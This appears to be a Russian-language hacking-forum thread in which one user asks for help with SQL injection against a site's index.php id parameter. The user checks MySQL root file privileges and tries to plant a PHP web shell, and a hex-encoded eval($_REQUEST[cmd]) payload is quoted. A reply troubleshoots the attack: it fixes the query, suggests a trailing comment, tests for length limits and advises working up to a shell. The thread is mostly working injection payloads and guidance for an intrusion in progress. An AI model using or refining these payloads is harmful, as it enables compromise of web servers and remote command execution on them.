Сообщение от
Evil_Genius
Привет!
Делаю запрос
site.ru/index.php?id=-14+union+select+file_priv,2+from+mysql.user+where+ user='root'
На что выдает
Y Unknown column 'id' in 'where clause'
Далее пытаюсь залить шелл
На что выдает
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and id<>-14 union select '',2 from mysql.user in' at line 1
Как правильно составить запрос, чтобы не выскакивала ошибка?
Сообщение от
None
Захексил, выполнил запрос и вот что выдает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and id<>-14 union select 0x3c3f706870206576616c28245f524551554553545b636d64 5d29' at line 1
Такое ощущение, что вы копируете сюда не те запросы, которые выполняете.
По первому:
1) У рута file_priv есть по умолчанию.
2) Колонки id в mysql.user нет.
3) Если запрос таки правильный, вставьте комментарий в конец.
По второму:
1) Действительно, копируйте запрос.
2) Если ограничение на длину, проверьте простым вписыванием длинной строки в хексе.
3) Ошибка синтаксиса - это все еще ошибка синтаксиса. Начните с запроса, который выполняется корректно, а потом доводите до шелла.